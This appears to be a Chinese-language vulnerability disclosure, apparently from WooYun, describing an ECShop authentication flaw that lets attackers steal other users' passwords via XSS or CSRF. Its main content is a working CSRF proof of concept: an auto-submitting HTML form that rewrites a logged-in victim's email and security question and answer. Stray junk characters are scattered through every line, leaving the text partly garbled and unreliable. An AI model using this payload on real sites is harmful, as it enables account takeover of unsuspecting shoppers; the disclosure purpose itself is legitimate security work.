简要描述:
7 G+ n9 ~ m" }" ]$ Q8 q! V+ }ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现: {! W" e% z: D' V3 Y
$ H6 m8 K5 s/ `3 M& u! L0 ~- X
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
' s; y- h" p( C9 ~% u& i; B
4 |8 ?/ l3 r7 Q; N$ T! l5 b详细说明:& {1 g) |% t" s1 D Z! I
利用csrf和xss可以突破官方所说的“障碍”
8 ]' R9 |! Z N# @" y% m7 hxss版本已经有人说明
. P6 o5 Z# G0 f这里给出csrf版本$ ]6 m" x) C5 u) g
0 o& ^2 H C$ O/ R$ @漏洞证明:, C# F' ?4 f/ j. ~! J
<html>/ ^% f( H( E3 f; ?4 m$ Q$ {- [" E
<body>
, y4 y+ [; L- |4 V<form action="http://www.wooyun.org/ecshop/user.php" method="POST">+ l& Z% I1 z9 k2 H& J
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 p9 q1 [5 D+ H7 Z<INPUT TYPE="text" NAME="act" value="act_edit_profile">( s. @3 j4 t, h* m1 G! G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">9 k0 [8 R" o* `
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">3 e. V/ }- {& S( A# `# L n
</body>
) n s9 U( B" r1 J<script>- e) I0 v5 r) j: Q
document.forms[0].submit();, g1 Z, d D- m' |+ E* s5 v
</script>
9 N1 _ }2 x, q8 K1 T* d# }/ \</html>7 R# C0 l+ T+ s h0 r. Y* A/ i( }
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失# w5 R# S8 K. ^$ I" d& Q& j
" e. N" X0 a- E' x- k4 @$ {
|